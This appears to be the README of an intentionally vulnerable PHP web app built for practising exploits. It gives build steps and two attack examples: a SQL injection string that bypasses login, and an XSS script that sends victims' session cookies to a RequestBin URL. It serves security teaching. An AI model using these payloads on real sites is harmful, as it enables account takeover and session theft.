Home

Awesome

Hack This

A collection of common web programming mistakes.

Screenshot

This website, when set up and configured, contains a number of vulnerabilities that can be exploited, including:

Prerequisites

You'll need to have a web server installed and configured with PHP for this to work. I really recommend XAMPP, especially for Windows users. Once you've done that you can proceed.

You'll also need Node.js and npm installed and working.

Building

Clone the project down and open the folder in your favourite editor. It's a JetBrains PhpStorm project but you can use whichever paid/free software takes your fancy.

First, install the npm packages necessary to build and run the website. Run the following in your terminal in the project root directory:

npm install

This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:

bower install

Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:

gulp

This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.

Setup

To set everything up, you'll need to:

Examples

Examples of vulnerabilities in this web application include:

SQL Injection

In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).

Bypass Login (SQL Injection)

It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:

foo' or '1'='1

Session Hijacking (XSS)

Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} substituted out for your RequestBin bin ID).

<script>
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
    xmlHttp.send(null);
</script>

Warnings

This site is intentionally left vulnerable to common exploits. Don't host it on the same server as any production sites, only ever deploy it on a machine that you wouldn't mind bricking (I recommend a disposable VM).

Acknowledgements

This is heavily based on the php-sploits repository by Jared Mooring and Allan Shone. Find the slides for their SydPHP talk here.

The homepage template is a highly modified version of the Blackrock Digital Freelancer template. Wonderful, free, MIT licensed template. Check it out if you're in the market for such a thing.